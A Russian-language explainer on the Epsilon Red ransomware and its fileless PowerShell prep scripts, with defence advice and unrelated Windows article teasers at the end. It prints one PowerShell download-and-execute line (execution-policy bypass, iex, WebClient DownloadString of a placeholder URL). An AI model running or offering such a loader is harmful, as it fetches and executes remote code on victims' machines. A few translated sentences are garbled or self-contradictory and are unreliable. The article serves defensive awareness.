Вы уже пропатчили свои серверы ?
Новая угроза -вымогатель под названием Epsilon Red нацелена на неисправленные серверы Microsoft в корпоративных центрах обработки данных. Названный в честь малоизвестного злодея из комиксов Marvel, Epsilon Red недавно был обнаружен компанией по кибербезопасности Sophos. С момента своего обнаружения программа-вымогатель атаковала многие организации по всему миру.
Бесфайловый вирус-вымогатель «прячется» в PowerShell
Бесфайловые программы-вымогатели — это разновидность вредоносного ПО, которое запускается в комплекте с законным программным обеспечением. Бесфайловое вредоносное ПО на базе PowerShell использует способность PowerShell загружаться непосредственно в память устройства. Эта функция помогает защитить вредоносное ПО в сценариях PowerShell от обнаружения.
В типичном сценарии при выполнении сценария его сначала необходимо записать на диск устройства. Это позволяет решениям по обеспечению безопасности конечных точек обнаруживать сценарии. Поскольку PowerShell исключен из стандартных процессов выполнения сценариев, он может обходить безопасность конечных точек. Кроме того, использование параметра обхода в сценарии PowerShell позволяет злоумышленнику обойти ограничения сетевых сценариев.
Пример параметра обхода PowerShell:
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))Как видите, разработать параметры обхода PowerShell относительно просто.
В ответ Microsoft выпустила патч для устранения уязвимости удаленного выполнения вредоносного ПО, связанной с PowerShell. Однако патчи эффективны ровно настолько, насколько они используются. Многие организации смягчили стандарты установки исправлений, что сделало их среду уязвимой для атак. Цель Epsilon Red — воспользоваться этим уровнем уязвимости.
Двойная полезность Epsilon Red
Поскольку Epsilon Red наиболее эффективен против необновленных серверов Microsoft, вредоносное ПО можно использовать в качестве вымогателя и инструмента идентификации. Независимо от того, успешен ли Epsilon в среде, злоумышленники получают более полное представление о возможностях безопасности своей цели.
Если Epsilon удалось получить доступ к Microsoft Exchange Server, это означает, что организация не соблюдает общие рекомендации по обеспечению безопасности с помощью исправлений. Для злоумышленника это показывает, насколько легко Epsilon может скомпрометировать остальную среду цели.
Epsilon Red использует затемнение, чтобы скрыть свою полезную нагрузку. Обфускация делает код нечитаемым и используется во вредоносных программах PowerShell, чтобы избежать высокой читаемости сценариев PowerShell. При обфускации используются командлеты -псевдонимы PowerShell , которые затрудняют антивирусному программному обеспечению обнаружение вредоносных сценариев в журналах PowerShell.
Epsilon Red наиболее эффективен против непропатченных серверов Microsoft.
Однако запутанные сценарии PowerShell все равно можно идентифицировать. Распространенным признаком предстоящей атаки PowerShell Script является создание объекта WebClient. Злоумышленник создаст объект WebClient в коде PowerShell, чтобы установить внешнее соединение с удаленным URL-адресом , содержащим вредоносный код.
Если организация подвергается атаке, вероятность того, что она имеет достаточные меры безопасности для обнаружения запутанных сценариев PowerShell, очень мала. И наоборот, если Epsilon Red не удастся проникнуть на сервер, это укажет злоумышленнику на то, что сеть цели может быстро расшифровать вредоносное ПО PowerShell, что сделает атаку менее ценной и более ценной.
Кибер-вторжение Эпсилон Ред
Функционал Epsilon Red очень прост. Программное обеспечение использует серию скриптов Powershell для проникновения на серверы. Эти сценарии PowerShell пронумерованы от 1.ps1 до 12.ps1. Целью каждого сценария PowerShell является подготовка целевого сервера для окончательной полезной нагрузки.
Все сценарии PowerShell в Epsilon Red имеют свое предназначение. Один из сценариев PowerShell в Epsilon Red предназначен для разрешения правил брандмауэра целевой сети. Еще одно программное обеспечение из этой серии, предназначенное для удаления антивирусного программного обеспечения цели .
Как вы могли догадаться, эти сценарии работают синхронно, чтобы гарантировать, что после доставки полезной нагрузки цель не сможет быстро остановить ее продвижение.
Передача полезной нагрузки
Как только сценарии PowerShell от Epsilon освобождают место для своей окончательной полезной нагрузки, они распространяются как расширение Red.exe . При входе на сервер Red.exe сканирует файлы сервера и создает список путей к каталогам для каждого обнаруженного файла. После создания списка дочерние процессы создаются из основного файла вредоносной программы для каждого пути к каталогу в списке. Затем каждый подфайл программы-вымогателя шифрует путь к каталогу из файла списка.
После того, как все пути к папкам в списке Epson будут зашифрованы, останется файл .txt для информирования цели и запроса злоумышленника. Кроме того, все доступные сетевые узлы, подключенные к скомпрометированному серверу, будут скомпрометированы, и вероятность проникновения вредоносного ПО в сеть может возрасти.
Кто стоит за Эпсилон Ред?
Личности нападавших за «Эпсилон Ред» до сих пор неизвестны.
Личности нападавших, стоящих за Эпсилон Ред, до сих пор неизвестны. Однако некоторые улики указывают на происхождение нападавших. Первая подсказка — это название вредоносного ПО. Эпсилон Ред — злодей из «Людей Икс» русского происхождения.
Вторая подсказка заключается в записке о выкупе в файле .txt, который оставил код. Оно похоже на записку, оставленную бандой вымогателей REvil. Однако такое сходство не указывает на то, что нападавшие были членами этой банды. REvil осуществляет операцию RaaS (программа-вымогатель как услуга), в рамках которой филиалы платят REvil за доступ к ее вредоносному ПО.
Защитите себя от Эпсилон Ред
На данный момент Epsilon Red успешно проникает на неисправленные серверы. Это означает, что одна из лучших мер защиты от Epsilon Red и аналогичных вредоносных программ-вымогателей — обеспечить правильное управление вашей средой. Кроме того, наличие решения безопасности, которое может быстро расшифровывать сценарии PowerShell, будет полезным дополнением к вашей среде.
Если у вас возникли проблемы с установкой или обновлением приложения «Магазин» в Windows 10, это может быть связано с проблемой с кешем магазина. Узнайте как <strong>очистить кеш магазина Microsoft</strong> для вашей учетной записи в Windows 10.
Кейлоггер - это программное обеспечение для захвата и сбора информации о нажатиях клавиш. Узнайте о лучших бесплатных кейлоггерах для Windows. Как защитить свои данные!
Если вы используете Microsoft Edge на общем компьютере с Windows 10 и хотите сохранить конфиденциальность своей истории просмотров, узнайте, как настроить Edge для запуска в режиме InPrivate.
Вы можете решить многие проблемы, возникающие в Windows 11, с помощью настройки системы. Например, если игра не запускается, открытие и изменение настроек MSConfig может решить проблему.
VPNBook — бесплатный провайдер VPN с неограниченной пропускной способностью, идеален для доступа к заблокированным сайтам. Узнайте, как настроить VPN на Windows за считанные минуты.
Узнайте, как включить или отключить встроенное автозаполнение в адресной строке проводника и диалоговом окне «Выполнить» в Windows 10. Следуйте нашим простым шагам!
Windows 10 предоставляет <strong>меню параметров загрузки</strong>, позволяющее исправлять проблемы и перенастраивать систему. Узнайте, как получить доступ к этому меню.
Кнопка «Удобство доступа» на экране входа в Windows 10 дает возможность пользователям запускать приложения, такие как диспетчер задач и командную строку, для улучшения доступа и функциональности.
Эта статья поможет вам настроить переключение между веб-камерами на компьютере с Windows 10. Убедитесь, что у вас по умолчанию установлена нужная веб-камера.
Узнайте, как быстро и удобно открыть Блокнот в Windows 11 различными способами. Bлокнот — это незаменимое текстовое приложение, которое всегда под рукой.
